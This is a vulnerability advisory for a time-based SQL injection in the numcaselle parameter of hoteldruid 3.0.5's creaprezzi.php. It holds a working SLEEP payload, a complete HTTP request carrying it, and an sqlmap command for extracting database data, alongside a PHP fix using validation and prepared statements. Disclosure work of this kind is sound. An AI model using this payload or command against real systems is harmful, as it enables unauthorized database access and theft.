Affected Version: hoteldruid version 3.0.5

Product Link: https://www.hoteldruid.com/

Product Download Link: https://www.hoteldruid.com/download/hoteldruid_3.0.5.zip

Security Issue:

SQL injection via POST parameter numcaselle

URL: http://localhost/hoteldruid/creaprezzi.php
Method: POST
Vulnerable Parameter: numcaselle
Payload: 1' AND (SELECT 7151 FROM (SELECT(SLEEP(5)))EAXh) AND 'aBsm'='aBsm

Vulnerability Description:

SQL injection (SQLi) is an injection attack in which user-supplied input is placed into a SQL statement without separating code from data, so an attacker can execute SQL statements of their choosing against the web application's database server. Here the numcaselle value is reflected into a query built by creaprezzi.php, and the time-based payload above makes the database pause for five seconds, which confirms the injection without any output being returned in the page.
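The following PHP snippet is an added illustration of the defect class and its fix; it is not hoteldruid's own code and does not claim to show how creaprezzi.php is written. The table name prezzi, the function names, and the use of mysqli with the mysqlnd driver (needed for get_result()) are assumptions. It contrasts a handler that concatenates the raw numcaselle POST value into the SQL text with one that validates the value as an integer and binds it as a prepared-statement parameter, so a quote character in the input can never terminate the string literal.

```php
<?php
// Added example, not hoteldruid's code. Assumed table "prezzi" with an
// integer column "numcaselle"; assumed mysqli connection with mysqlnd.

// Vulnerable pattern (hypothetical): the POST value is spliced into the
// SQL text. A single quote in the value closes the literal and everything
// after it is parsed as SQL, which is exactly what the advisory's payload
// relies on.
function build_query_unsafe(string $numcaselle): string
{
    return "SELECT * FROM prezzi WHERE numcaselle = '" . $numcaselle . "'";
}

// Hardened step 1: enforce the expected type before the value goes
// anywhere near the database. A time-based payload is rejected here with
// a 400 because it is not an integer.
function read_numcaselle(array $post): int
{
    $value = filter_var(
        $post['numcaselle'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 0]]
    );
    if ($value === false) {
        http_response_code(400);
        exit('numcaselle must be a non-negative integer');
    }
    return $value;
}

// Hardened step 2: even with a validated value, pass it as a bound
// parameter so the SQL text and the data are sent to the server separately.
function fetch_prices(mysqli $db, int $numcaselle): array
{
    $stmt = $db->prepare('SELECT * FROM prezzi WHERE numcaselle = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('i', $numcaselle);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// Usage inside the request handler (assumed $db is an open mysqli link):
// $rows = fetch_prices($db, read_numcaselle($_POST));
```

The validation step alone would stop the payload shown in this advisory, but the prepared statement is what removes the vulnerability class: if the column were later changed to a string type, or the check were loosened, the query would still treat the input as data only.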

Process to reproduce:

1. Copy the HTTP request below
2. Save it as sqli.txt
3. Run the sqlmap command below to see the data extracted from the database

HTTP Request:

POST /hoteldruid/creaprezzi.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----------YWJkMTQzNDcw
Accept: */*
Referer: http://localhost/hoteldruid/
Content-Length: 5575
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="anno"

2023
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="id_sessione"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="numcaselle"

1' AND (SELECT 7151 FROM (SELECT(SLEEP(5)))EAXh) AND 'aBsm'='aBsm
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="tipotariffa"

tariffa1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo1"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo1"

2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo1"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo1p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo2"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo2"

2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo2"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo2p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo3"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo3"

2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo3"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo3p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo4"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo4"

2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo4"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo4p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo5"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo5"

2023-01-31
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo5"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo5p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo6"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo6"

2023-01-24
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo6"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo6p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo7"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo7"

2023-01-24
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo7"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo7p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo8"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo8"

2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo8"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo8p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo9"

2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo9"

2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo9"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo9p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo10"

2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo10"

2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo10"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo10p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo11"

2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo11"

2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo11"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo11p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo12"

2023-01-09
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo12"

2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo12"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo12p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo13"

2023-01-22
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo13"

2023-01-23
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo13"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo13p"

1
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="inizioperiodo14"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="fineperiodo14"

2023-01-01
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo14"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="prezzoperiodo14p"

------------YWJkMTQzNDcw
Content-Disposition: form-data; name="modifica"

1
------------YWJkMTQzNDcw--

HTTP Response:

[screenshot of the response not reproduced]

Proof of Exploit:

SQL query: SELECT database()
Result: hoteldruid

Screenshot:

[screenshot of the sqlmap output not reproduced]

Command used: sqlmap -r sqli.txt -p numcaselle --risk 3 --level 5 --dbs --current-user --current-db

The impact of this vulnerability:

An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of the entire database. SQLi can also be used to add, modify and delete records, affecting data integrity. Under the right circumstances (for example, a database account with file or command-execution privileges), SQLi can also be used to execute OS commands, which may then be used to escalate the attack even further.